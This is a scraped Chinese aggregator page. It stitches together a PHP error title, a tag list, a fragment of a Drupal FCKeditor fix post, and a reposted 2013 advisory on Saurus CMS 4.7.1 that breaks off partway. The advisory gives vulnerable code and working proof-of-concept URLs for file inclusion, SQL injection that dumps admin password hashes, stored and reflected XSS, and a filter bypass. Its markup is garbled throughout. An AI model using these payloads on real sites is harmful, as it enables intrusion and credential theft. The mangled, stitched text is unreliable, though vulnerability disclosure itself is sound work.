Fatal error: Class 'fckeditor 2.6.3 漏洞' not found -------on line 238

羽毛球技术 | 体育赛事 | 英文歌曲 | 住宅风水 | 用户界面设计师 | 六爻 | 书籍改编电影 | 德国足球甲级联赛 | 欧美明星 | PLC | 中国足球 | aj1 | 国家队 | 拜仁慕尼黑足球俱乐部 | 小说创作 | 配音 | iOS应用 | NBA 2K | 古典音乐 | 面相 | 火影忍者 | 武汉大学 | 土拨鼠 | 营销策划 | 秦时明月之天行九歌 | 设计师 | 巴塞罗那足球俱乐部 | 尤文图斯 | 实况足球（游戏） | 少帅 | 罗玉凤 | 比利时 | 跑鞋 | 冷知识 | 肖战 | 李元胜 | 古琴 | 按键精灵 | 罗兰 | 徐波 | 激光手术 | 角色扮演 | 关晓彤 | 微电影 | safari | 北京国安 | 古汉语 | 曼彻斯特联 | 玄幻小说 | 科幻小说 | 双眼皮手术 | 主题曲 | 年会 | 检测仪 | 徒步 | 互联网公司 | 百度输入法 | 镜头 | 宜昌市 | 自拍 | 金蝶 | 电子烟 | 网站建设 | 广播体操 | 文身 | nba篮球 | 索尼(sony) | 天体物理学 | 痛风 | 象棋 | 牛皮癣 | 皮肤护理 | 周星驰（人物） | 试管婴儿 | 亚足联亚洲杯（AFC Asian Cup） | 健美 | 美术生 | 迅雷（软件） | 战斗机 | 穿越小说 | 张璐 | 姓氏 | 诸葛亮 | 后宫·甄嬛传（书籍） | 虎牙直播 | snh48 | 阿迪达斯 | 投影仪 | 组装机 | 微信群 | 阿迪达斯(adidas) | 网球王子 | 分子生物学 | 耽美 | 武磊 | 婚礼 | 表演 | 中国武术 | 动画电影 | Air Jordan | 张子枫 | 免费软件 | 相声演员 | 摩羯座 | 宿舍 | ansys | 法国足球甲级联赛 | 户外 | 剧场版 | 杨凡 | 科幻电影 | galgame | 融资 | 关节炎 | NBA季后赛 | 神话 | 王力宏（人物） | 建模 | 计算机病毒 | 广州恒大淘宝足球俱乐部 | 北京奥运会 | 电脑电源 | 百度翻译 | 字幕 | 讯飞输入法 | 海关 | 易烊千玺 | 深度学习 | 编辑器 | 澳门特别行政区 | 直播 | 流氓软件 | 事故 | 大片 | 李景亮 | 郭富城 | 日语歌曲 | 卡牌游戏 | 小品 | 东京 | 花卉 | 音乐剧 | 互联网创业 | 占卜 | 羽毛球拍 | 婆媳关系 | 日本动画 | 巴黎 | 拳击比赛 | 东南亚 | 足球经理（FM）（游戏） | youtube | 胡歌（演员） | 地铁跑酷 | 植发 | 张继科 | 三国 | 用户界面 | 演技 | 百度竞价 | 青梅竹马 | 移动硬盘 | 韩晓鹏 | 马龙 | 瘦腿 | 宠物医疗 | 巨蟹座 | 徐峥 | 天蝎座 | 胸肌 | 赵丽颖（演员） | adidas阿迪达斯 | 低音炮 | 星际争霸（游戏） | 豆瓣电影 | 微信开放平台 | 手绘 | 吉他学习 | 江苏卫视 | 模特 | 创意 | 团队管理 | 奢侈品 | 王源 | TANK | 笛子 | 偶像 | 莱斯特城 | 维生素 | 新百伦 | 国际物流 | 前女友 | 李小龙 | 华语流行音乐 | 猎头公司 | crm | 搏击项目 | 网站运营 | 鼻炎 | 篮球游戏 |

你的位置：网站首页 >> 频道首页 >>编程语言 >>Fatal error: Class 'fckeditor 2.6.3 漏洞' not found -------on line 238

Fatal error: Class 'fckeditor 2.6.3 漏洞' not found -------on line 238

来源：蜘蛛抓取(WebSpider) 时间：2014-11-16 20:16 标签： fckeditor

& Drupal6中FCkeditor模块与Firefox浏览器(17版本以后)冲突问题
更换为一下代码
return TRUE;
改完以后尝试火狐浏览器，果然可以正常使用了，呵呵。虽然不是什么大问题，但还是习惯用火狐。希望对大家有帮助～～～
本站所有文章欢迎转载，所有文章未说明，均属于原创，转载均请注明出处。
本文有效链接：
版权所有：
本文作者:（发表日志6篇）
CTO 高级工程师
专注于Drupal网站优化，服务器架构设计，性能优化提升及相关运维。
经典Drupal讲座文档下载
刘先生留言: 请问，是否提供drupal服务器托管，或者提供高性能建站的培训课程。
(17 weeks ago) 留言: 这个方法亲测有效！谢谢博主。想把这个办法跟其他一些解决办法总结一下写到自己博客。
(20 weeks ago)iVanilla 留言: 用这个配置会出错：
PHP Fatal error:
Uncaught Error: Class 'Redis_Cache' not found in /v
(24 weeks ago)teng long 留言: 请问，url带query string和不带的都生产一样的缓存，是什么问题？
比如我有一个手机版的网站，url是?mobi
(53 weeks ago)Gina 留言: 你好
想问问有点看不太明白的地方。。。
如果我现在有跟, 运用在相同的主机，绑定那两个域名，这样也能实现吗？
(56 weeks ago)
备案编号: 京ICP备号114网址导航114网址导航Write your own PHP MVC Framework (Part 1) | anant garg
2783&Words417241 ViewsIncrease your site interactivity in minutes. Click here& & [waraxe-2013-SA#106] - Multiple Vulnerabilities in Saurus CMS 4.7.1 ===================================================
作者: Janek Vind "waraxe"
介绍: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Web publishing system combining daily content management features with site administration and development tools.
Vulnerable was version 4.7.1 before 07. June 2013, older versions not tested:
/version-history/
############################################## 1. 本地文件包含缺陷 "admin/fckeditor_dialog_image.php" ########################################
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied parameter "dialog" Preconditions:
1. Logged in as Saurus CMS user
2. At least one valid file ID must be known (can be bruteforced)
Php script. "admin/fckeditor_dialog_image.php" line 101:------------------------[ source code start ]---------------------------------- $object = new Objekt(array(
'objekt_id' =& (int)$site-&fdat['file_id'],
'on_sisu' =& 1, )); .. include_once('../js/fckeditor/editor/'.$site-&fdat['dialog']); ------------------------[ source code end ]------------------------------------
Test (parameter "file_id" must be valid):
http://localhost/saurus471/admin/fckeditor_dialog_image.php?file_id=10572&dialog=../../../.htaccess
Result: contents of ".htaccess" file from Saurus CMS root directory will be revealed, LFI confirmed.
########### 2. Local File Inclusion in "extensions/saurus4/captcha_image.php" ###########
1. uninitialized variable "$captcha" Attack vector:
1. user-supplied parameter "captcha" Preconditions:
1. PHP setting "register_globals = on"
Php script. "extensions/saurus4/captcha_image.php" line 45: ------------------------[ source code start ]---------------------------------- switch ($captcha['image_type']) {
case 'gif':
include_once($class_path.'lgpl/GotchaGIF.class.php');
$img = new GotchaGIF($captcha['image_width'], $captcha['image_height']); .. if($img-&create()) {
//apply effects
foreach($captcha['effects'] as $effect)
$effect_name = $effect['name'];
//echo $effect_
include_once($class_path.'lgpl/'.$effect_name.'.class.php'); ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/extensions/saurus4/captcha_image.php? captcha[image_type]=gif&captcha[image_width]=50&captcha[image_height]=50& captcha[effects][0][name]=../waraxe
Warning: include_once(../../classes/lgpl/../waraxe.class.php) [function.include-once]: failed to open stream: No such file or directory in C:\apache_www\saurus471\extensions\saurus4\captcha_image.php on line 73
PHP error message above confirms LFI vulnerability.
########### 3. Local File Inclusion in "admin/edit.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied parameter "extension_path" Preconditions:
1. Logged in as Saurus CMS user
Php script. "admin/edit.php" line 76: ------------------------[ source code start ]---------------------------------- if($site-&fdat['extension_path']) {
$actions_file = '..'.$site-&fdat['extension_path'].'/actions.inc.php'; .. if (file_exists($actions_file)){
include_once($actions_file); ------------------------[ source code end ]------------------------------------
########### 4. Remote File Inclusion in "map.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied GET parameter "cmd" Preconditions:
1. Windows server
Php script. "map.php" line 56: ------------------------[ source code start ]---------------------------------- $tmp_cmd=explode("/",$_GET['cmd']); .. foreach($tmp_cmd as $t){
// if the there is a .php in the URL then don't use aliases go directly to that file
if(preg_match('/\.php$/i', $t) && file_exists($t) && !preg_match("#^\.\./#", $t)) ..
include($t); ------------------------[ source code end ]------------------------------------
On *nix servers this code above is secure enough, but things change in case of Windows server - attacker is able to use backslashes, which leads to RFI.
Example attack using local file:
http://localhost/saurus471/map.php?cmd=..\..\..\..\test.php
Example attack using remote file:
http://localhost/saurus471/map.php?cmd=\\192.168.1.25\test.php
########### 5. Remote File Inclusion in "admin/change_config.php" ###########
1. uninitialized variable "$class_path" Attack vector:
1. user-supplied parameter "class_path" Preconditions:
1. PHP setting "register_globals = on"
Php script. "admin/change_config.php" line 25: ------------------------[ source code start ]---------------------------------- global $class_ .. if(!isset($class_path)) {
$class_path = "../classes/"; } .. include_once($class_path."port.inc.php"); ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/change_config.php?class_path=http://php.net/?
########### 6. Remote File Inclusion in "admin/repair_database.php" ###########
1. uninitialized variable "$class_path" Attack vector:
1. user-supplied parameter "class_path" Preconditions:
1. PHP setting "register_globals = on"
Php script. "admin/repair_database.php" line 23: ------------------------[ source code start ]---------------------------------- global $class_
if(!isset($class_path)) {
$class_path = "../classes/"; }
include_once($class_path."port.inc.php"); ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/repair_database.php?class_path=http://php.net/?
########### 7. Remote File Inclusion in "admin/check_adminpage.php" ###########
1. uninitialized variable "$class_path" Attack vector:
1. user-supplied parameter "class_path" Preconditions:
1. PHP setting "register_globals = on"
Php script. "admin/check_adminpage.php" line 29: ------------------------[ source code start ]---------------------------------- if(!isset($class_path)) { $class_path = "../classes/"; }
include($class_path."port.inc.php"); ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/check_adminpage.php?class_path=http://php.net/?
########### 8. SQL Injection in "index.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied GET parameter "pg" Preconditions:
1. PHP setting "magic_quotes_gpc = Off"
Php script. "index.php" line 303: ------------------------[ source code start ]---------------------------------- if ($CMS_SETTINGS['switch_lang_enabled'] && !$cache_data && !$_GET['lang'] &&
!$_GET['keel'] && (is_numeric($_GET['id']) || is_numeric($_GET['pg']))){
$myid = $_GET['id'] ? $_GET['id'] : $_GET['pg'];
$sql = "SELECT keel.extension FROM objekt LEFT JOIN keel ON
keel.keel_id=objekt.keel WHERE objekt_id='".$myid."'";
$sth = new SQL($sql);
$mykeel = $sth-&fetchsingle(); ------------------------[ source code end ]------------------------------------
As seen above, user-submitted GET parameters "id" and "pg" are checked to be numeric before using them in SQL query. If we analyze source code more closely, then it appears to be not as secure as planned by programmer. Attacker can input GET parameter "id" with value of "0" and GET parameter "pg" with SQL injection string containing single quote. As parameter "id" is numeric, checking code will be bypassed. Next line of code tests parameter "id" and because it is zero, variable "$myid" will get value from parameter "pg". This leads to SQL Injection.
http://localhost/saurus471/?speed_debug=on&id=0&pg=123
Result: "Page was generated in 1.20000 seconds.", normal server response.
http://localhost/saurus471/?speed_debug=on&id=0&pg='+UNION+SELECT+SLEEP(5)%23
Result: "Page was generated in 6.17751 seconds.", delay observed, SQL Injection confirmed.
########### 9. SQL Injection in "classes/sapi/function.init_search_results.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied parameter "sites" Preconditions: none
Php script. "classes/sapi/function.init_search_results.php" line 27: ------------------------[ source code start ]---------------------------------- function smarty_function_init_search_results($params,&$smarty) { ..
if(!isset($sites)) $sites = $site-&fdat['sites']; ..
$pre_search_explode=explode(",",strtolower(trim($sites)));
foreach($pre_search_explode as $k=&$v){
$pre_search_explode[$k]=trim($v);
$sql_keel = "SELECT keel_id FROM keel WHERE on_kasutusel=1 AND extension IN ('".implode("','",$pre_search_explode)."')"; ..
$sth = new SQL($sql_keel);
while($r = $sth-&fetch("ASSOC")){
$keeled[]=$r['keel_id']; ------------------------[ source code end ]------------------------------------
As seen above, user-submitted parameter "sites" ends up used in SQL query without proper sanitization, which leads to SQL Injection vulnerability.
http://localhost/saurus471/index.php?op=search&speed_debug=on&sites=waraxe
Result: "Page was generated in 1.18560 seconds.", normal server response.
http://localhost/saurus471/index.php?op=search&speed_debug=on&sites=')UNION+SELECT+SLEEP(5)%23
Result: "Page was generated in 6.22651 seconds.", delay observed, SQL Injection confirmed.
########### 10. SQL Injection in "admin/error_log.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied parameters "algus", "lopp", "err_type", "sortby" and "sort" Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/error_log.php" line 63: ------------------------[ source code start ]---------------------------------- $algus_aeg = $site-&fdat['algus']? $site-&fdat['algus'] : date("d.m.Y",$start_d); $lopp_aeg = $site-&fdat['lopp']? $site-&fdat['lopp'] : date("d.m.Y"); .. if ($algus_aeg) {
$where_sql[] = " error_log.time_of_error&='".$site-&db-&ee_MySQL($algus_aeg)." 00:00' ";
} if ($lopp_aeg) {
$where_sql[] = " error_log.time_of_error&='".$site-&db-&ee_MySQL($lopp_aeg)." 23:59' ";
} if ($site-&fdat['err_type']) {
$where_sql[] = " error_log.err_type = '".$site-&fdat['err_type']."' "; } .. $where_str = sizeof($where_sql)&0 ? " WHERE ".join(" AND ",$where_sql) : ''; .. $site-&fdat['sortby'] = $site-&fdat['sortby'] ? $site-&fdat['sortby'] : 'time_of_error'; $site-&fdat['sort'] = $site-&fdat['sort'] ? $site-&fdat['sort'] : 'DESC'; .. if($site-&fdat['sortby']){
$order = " ORDER BY ".$site-&fdat['sortby']." ".$site-&fdat['sort']; } .. $sql = $site-&db-&prepare("SELECT DATE_FORMAT(time_of_error,'%d.%m.%y %T') AS time_of_errorf, error_log.*"); $sql .= $from_ $sql .= $where_ $sql .= $ $sql .= $pagenumbers['limit_sql']; .. $sth = new SQL($sql); .. while ( $log = $sth-&fetch() ) { ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23 http://localhost/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23 http://localhost/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
MySQL version info will be revealed
http://localhost/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23 http://localhost/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23 http://localhost/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
Username and password hash of the Saurus CMS user with ID 1 will be revealed
########### 11. SQL Injection in "admin/extensions.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied parameters "sortby" and "sort" Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/extensions.php" line 297: ------------------------[ source code start ]---------------------------------- $site-&fdat['sortby'] = $site-&fdat['sortby'] ? $site-&fdat['sortby'] : 'name'; $site-&fdat['sort'] = $site-&fdat['sort'] ? $site-&fdat['sort'] : 'ASC'; .. if($site-&fdat['sortby']){
$order = " ORDER BY ".$site-&fdat['sortby']." ".$site-&fdat['sort']; } .. $sql = $site-&db-&prepare("SELECT DATE_FORMAT(version_date,'%d.%m.%Y') AS fversion_date, extensions.*"); $sql .= $from_ $sql .= $ .. $sth = new SQL($sql); .. while ( $ext = $sth-&fetch() ) { ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/extensions.php?sortby=1
Result: normal server response, no additional delay.
http://localhost/saurus471/admin/extensions.php?sortby=SLEEP(5)%23
Result: additionial delay observed, SQL Injection confirmed.
########### 12. SQL Injection in "admin/profile_data.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied parameters "sortby" and "sort" Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/profile_data.php" line 521: ------------------------[ source code start ]---------------------------------- if($site-&fdat['sortby']){
$order = " ORDER BY ".$site-&fdat['sortby']." ".$site-&fdat['sort'];
$sql .= $from_
$sql .= $pagenumbers['limit_sql'];
$sth = new SQL($sql); ..
if($sth-&rows){ ..
while($asset = $sth-&fetch()){ ------------------------[ source code end ]------------------------------------
########### 13. SQL Injection in "classes/user_html.inc.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied parameters "sortby" and "sort" Preconditions:
1. logged in as Saurus CMS admin
Php script. "classes/user_html.inc.php" line 313: ------------------------[ source code start ]---------------------------------- $order = " ORDER BY ".$site-&fdat['sortby']." ".$site-&fdat['sort']; .. $sql = $site-&db-&prepare("SELECT users.* FROM users "); $sql .= $ $sql .= $ $sql .= $ $sql .= $pagenumbers['limit_sql']; .. $sth = new SQL($sql); .. while($tmp = $sth-&fetch()){ ------------------------[ source code end ]------------------------------------
########### 14. SQL Injection in "admin/sys_sonad_loetelu.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied parameter "sst_id" Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/sys_sonad_loetelu.php" line 123: ------------------------[ source code start ]---------------------------------- $sst_id = ($site-&fdat['sst_id'] ? $site-&fdat['sst_id'] : $glossary_word_types[0]['sst_id']);
if(is_numeric($site-&fdat['flt_keel'])) { ..
$otsi = $otsi ? " (sys_sonad_kirjeldus.sona LIKE '%".$otsi."%' OR
sys_sonad.sona LIKE '%".$otsi."%' OR sys_sonad.origin_sona LIKE
'%".$otsi."%' OR sys_sonad.sys_sona LIKE '%".$otsi."%' OR
sys_sonad_kirjeldus.sys_sona LIKE '%".$otsi."%') " : " sys_sonad.sst_id=".$sst_
$where_str = $site-&db-&prepare(" WHERE sys_sonad.keel=? AND ".$otsi." ",
); .. $sql .= $where_ .. $sth = new SQL($sql); .. while ( $mysona = $sth-&fetch('ASSOC') ) {
$words[] = $ } ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+@@version,1,1,1,1,1,1,1%23
MySQL version info will be revealed
http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+CONCAT_WS(0x3a,username,password),1,1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
Username and password hash of the Saurus CMS user with ID 1 will be revealed
########### 15. SQL Injection in "admin/change_config.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied parameter "timezone" Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/change_config.php" line 153: ------------------------[ source code start ]---------------------------------- $q="update config set sisu='".$site-&fdat['timezone']."' where nimi='time_zone'"; new SQL($q); ------------------------[ source code end ]------------------------------------
########### 16. Stored XSS in "admin/log.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied parameter "user" Preconditions:
1. "Enable site log" enabled (it is by default)
Php script. "classes/site.class.php" line 538: ------------------------[ source code start ]---------------------------------- if($this-&fdat["op"] == 'login' && $this-&fdat["url"] &&
$this-&CONF['disable_form_based_login'] != "1") {
$this-&user = new User(array(
user =& $this-&fdat["user"],
pass =& $this-&fdat["pass"],
"site" =& &$this,
$user_id = $this-&user-&user_
if ($user_id) { ..
# kirjuta logi
new Log(array(
'action' =& 'log in',
'component' =& 'Users',
'type' =& 'NOTICE',
'message' =& "Unauthorized access to CMS:
username '".$this-&fdat["user"]."', IP: '".$_SERVER["REMOTE_ADDR"]."'",
)); ------------------------[ source code end ]------------------------------------
As seen above, in case of failed login attempt site log entry will be created, containing various information, including submitted username.
Php script. "admin/log.php" line 265: ------------------------[ source code start ]---------------------------------- &?php foreach ($log_records as $log_record) { //printr($log_record); ?& ..
&td&&?=$log_record['message'];?&&/td& ------------------------[ source code end ]------------------------------------
We can see, that php script. "admin/log.php", used by admins for sitelog view, does not implement proper encoding or escaping of output, leading to Stored XSS vulenrability. Because this specific XSS payload can be inserted by anonymous user, but target victim is admin, then it has serious security impact and can lead to site full compromise. Possible attack scenario: 1. Stored XSS insertion, 2. admin opens log.php, XSS payload steals CSRF token, 3. CSRF attack, new admin account creation, 4. attacker logs in as new admin, game over ...
1. Issue GET request as below:
http://localhost/saurus471/admin/?op=login&url=1&user=&script&alert(123);&/script&
2. Log in as Saurus CMS admin and open site log page:
http://localhost/saurus471/admin/log.php
javascript. alert box pops up, confirming Stored XSS vulnerability.
########### 17. Stored XSS in "admin/error_log.php" ###########
1. improper encoding or escaping of output Preconditions:
1. "Save PHP and MySQL errors into the database" enabled (it is by default)
Php script. "classes/port.inc.php" line 150: ------------------------[ source code start ]---------------------------------- function saurusErrorHandler($errno, $errmsg, $filename, $linenum, $vars){ ..
if (!defined("SAVE_ERROR_LOG")){
$res = @mysql_query("SELECT sisu FROM config WHERE nimi='save_error_log'");
if ($res){
list($tmp) = @mysql_fetch_array($res);
define("SAVE_ERROR_LOG", ($tmp ? 1:0));
if (SAVE_ERROR_LOG && !substr_count($errmsg, 'mysql_num_fields')){
@mysql_query("INSERT INTO error_log (time_of_error, source, err_text,
err_type, domain, referrer, fdat_scope, ip, remote_user) VALUES (NOW(),
'".addslashes($filename." line ".$linenum)."', '".addslashes($errmsg)."',
'PHP', '".addslashes($_SERVER['HTTP_HOST'])."',
'".addslashes($_SERVER['REQUEST_URI'])."', '".addslashes($serialized_fdat).
"', '".$_SERVER['REMOTE_ADDR']."', '".addslashes($_SERVER['REMOTE_USER'])."')");
# Redefine error handler $old_error_handler = set_error_handler("saurusErrorHandler"); ------------------------[ source code end ]------------------------------------
As seen above, new PHP error handler is defined, which writes all PHP error messages to error log in database.
Php script. "admin/error_log.php" line 320: ------------------------[ source code start ]---------------------------------- &td width="60%"&&?= $log['err_text'] ?&&/td& ------------------------[ source code end ]------------------------------------
We can see, that php script. "admin/log.php", used by admins for error log view, does not implement proper encoding or escaping of output, leading to Stored XSS vulenrability. Because this specific XSS payload can be inserted by anonymous user, but target victim is admin, then it has serious security impact and can lead to site full compromise by similar scenario as described in previous case.
1. Issue GET request as below (MySQL Injection from one of the previous cases):
http://localhost/saurus471/?id=0&pg='&script&alert(123);&/script&
2. Log in as Saurus CMS admin and open erro log page:
http://localhost/saurus471/admin/error_log.php
javascript. alert box pops up, confirming Stored XSS vulnerability.
########### 18. XSS protection bypass in "classes/port.inc.php" ###########
Php script. "classes/port.inc.php" line 536: ------------------------[ source code start ]---------------------------------- if(strstr($_SERVER['REQUEST_URI'], $CMS_SETTINGS['wwwroot'].'/admin/') === false && (
detect_xss_in_saurus_params($_SERVER['QUERY_STRING']) ||
detect_xss_in_saurus_params($_SERVER['REQUEST_URI']) ||
detect_xss_in_string($_SERVER['PHP_SELF']) ||
detect_xss_in_saurus_params($_POST) ||
detect_xss_in_saurus_params($_GET)) ) {
header('Location: '.$CMS_SETTINGS['wwwroot'].'/index.php'); } ------------------------[ source code end ]------------------------------------
We can see, that XSS detection functions are used against various input parameters and in case of positive hit redirection to home page follows. There is custom exclusion in place for administrative scripts and it's implementation is not secure enough - attacker can use "$CMS_SETTINGS['wwwroot'].'/admin/'" string in URI and XSS detection will be bypassed. String for XSS detection bypass is "/saurus471/admin/" in examples below.
http://localhost/saurus471/kalender.php?month=&script&
Result: XSS detected, redirection follows
http://localhost/saurus471/kalender.php?/saurus471/admin/&month=&script&
Result: XSS not detected, no redirection
########### 19. Reflected XSS in "kalender.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied parameters "form", "vorm", "form_field", "lahter" and "month" Preconditions: none
Php script. "kalender.php" line 50: ------------------------[ source code start ]---------------------------------- &script. type="text/javascript"& //&!-- // Handle click of OK link
function handleOK(selected_date) {
if (opener && !opener.closed) {
opener.document.&?if(isset($site-&fdat['form'])){echo $site-&fdat['form'];}
else{ echo $site-&fdat['vorm'];}?&.
&?if(isset($site-&fdat['form_field'])){echo $site-&fdat['form_field'];}
else{ echo $site-&fdat['lahter'];}?&.value=selected_
opener.document.&?if(isset($site-&fdat['form'])){echo $site-&fdat['form'];}
else{ echo $site-&fdat['vorm'];}?&.
&?if(isset($site-&fdat['form_field'])){echo $site-&fdat['form_field'];}
else{ echo $site-&fdat['lahter'];}?&.focus(); .. if($site-&fdat['month']&=1&&$site-&fdat['month']&=12) {
$month = $site-&fdat['month']; ..
defaultDate: new Date(&?=$?&, &?=$?& - 1, &?=$?&), ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/kalender.php?form=&/script&&script&alert(123);&/script& http://localhost/saurus471/kalender.php?vorm=&/script&&script&alert(123);&/script& http://localhost/saurus471/kalender.php?form_field=&/script&&script&alert(123);&/script& http://localhost/saurus471/kalender.php?lahter=&/script&&script&alert(123);&/script& http://localhost/saurus471/kalender.php?/saurus471/admin/&month=1&/script&&script&alert(123);&/script&
javascript. alert boxes pop up, confirming Reflected XSS vulnerabilities.
########### 20. Reflected XSS in "editor/kalender.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied parameters "form", "vorm", "form_field", "lahter" and "month" Preconditions:
1. must be logged in as user
Php script. "editor/kalender.php" line 50: ------------------------[ source code start ]---------------------------------- &script. type="text/javascript"& //&!-- // Handle click of OK link
function handleOK(selected_date) {
if (opener && !opener.closed) {
opener.document.&?if(isset($site-&fdat['form'])){echo $site-&fdat['form'];}
else{ echo $site-&fdat['vorm'];}?&.
&?if(isset($site-&fdat['form_field'])){echo $site-&fdat['form_field'];}
else{ echo $site-&fdat['lahter'];}?&.value=selected_
opener.document.&?if(isset($site-&fdat['form'])){echo $site-&fdat['form'];}
else{ echo $site-&fdat['vorm'];}?&.
&?if(isset($site-&fdat['form_field'])){echo $site-&fdat['form_field'];}
else{ echo $site-&fdat['lahter'];}?&.focus(); .. if($site-&fdat['month']&=1&&$site-&fdat['month']&=12) {
$month = $site-&fdat['month']; ..
defaultDate: new Date(&?=$?&, &?=$?& - 1, &?=$?&), ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/editor/kalender.php?form=&/script&&script&alert(123);&/script& http://localhost/saurus471/editor/kalender.php?vorm=&/script&&script&alert(123);&/script& http://localhost/saurus471/editor/kalender.php?form_field=&/script&&script&alert(123);&/script& http://localhost/saurus471/editor/kalender.php?lahter=&/script&&script&alert(123);&/script& http://localhost/saurus471/editor/kalender.php?/saurus471/admin/&month=1&/script&&script&alert(123);&/script&
javascript. alert boxes pop up, confirming Reflected XSS vulnerabilities.
########### 21. Reflected XSS in "admin/delete_log.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied parameter "tbl" Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/delete_log.php" line 176: ------------------------[ source code start ]---------------------------------- &input type="hidden" name="tbl" value="&?=$site-&fdat['tbl']?&"& ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/delete_log.php?tbl="&&script&alert(123);&/script&
javascript. alert box pops up, confirming Reflected XSS vulnerability.
########### 22. Reflected XSS in "admin/edit_adminpage.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied parameters "id" and
"op" Preconditions:
1. logged in as Saurus CMS admin
http://localhost/saurus471/admin/edit_adminpage.php?id="&&script&alert(123);&/script& http://localhost/saurus471/admin/edit_adminpage.php?op="&&script&alert(123);&/script&
javascript. alert boxes pop up, confirming Reflected XSS vulnerabilities.
########### 23. Reflected XSS in "admin/edit_group.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied parameter "group_id" Preconditions:
1. logged in as Saurus CMS admin
http://localhost/saurus471/admin/edit_group.php?op=edit&group_id=1"&&script&alert(123);&/script&
javascript. alert boxes pop up, confirming Reflected XSS vulnerabilities.
########### 24. Reflected XSS in "admin/profile_data.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied parameter "profile_id" Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/profile_data.php" line 65: ------------------------[ source code start ]---------------------------------- print "&font color=red&&b&Profile '".$site-&fdat['profile_id']."' not found!&/b&&/font&"; ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/profile_data.php?profile_id=&script&alert(123);&/script&
javascript. alert box pops up, confirming Reflected XSS vulnerability.
########### 25. Reflected XSS in "admin/edit_object.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied parameter "profile_id" Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/edit_object.php" line 101: ------------------------[ source code start ]---------------------------------- print "&font color=red&&b&Profile '".$profile_id."' not found!&/b&&/font&"; ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/edit.php?tab=object&op=new&&tyyp_id=20&profile_id=,&script&alert(123);&/script&
javascript. alert box pops up, confirming Reflected XSS vulnerability.
########### 26. Reflected XSS in "admin/edit_profile.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied parameter "pid" Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/edit_profile.php" line 997: ------------------------[ source code start ]---------------------------------- print "&font color=red&&b&Profile '".$site-&fdat['pid']."' not found!&/b&&/font&"; ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/edit_profile.php?op=edit&did=1&pid=&script&alert(123);&/script&
javascript. alert box pops up, confirming Reflected XSS vulnerability.
########### 27. Reflected XSS in "admin/profiles.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied parameters "profile_id", "source_table", "did" Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/profiles.php" line 247: ------------------------[ source code start ]---------------------------------- &TD class="scms_dropdown_item"&&a href="javascript：void(openpopup
('edit_profile.php?op=newdef&pid=&?= $site-&fdat['profile_id'] ?& .. &TD class="scms_dropdown_item"&&a href="javascript：void(openpopup
('edit_profile.php?op=new&pid=&?= $site-&fdat['profile_id']?&
&source_table=&?= $site-&fdat['source_table']?& .. &TD nowrap&&?if($site-&fdat['profile_id']){?&&a href="javascript：void(openpopup
('edit_profile.php?op=edit&pid=&?= $site-&fdat['profile_id']?&
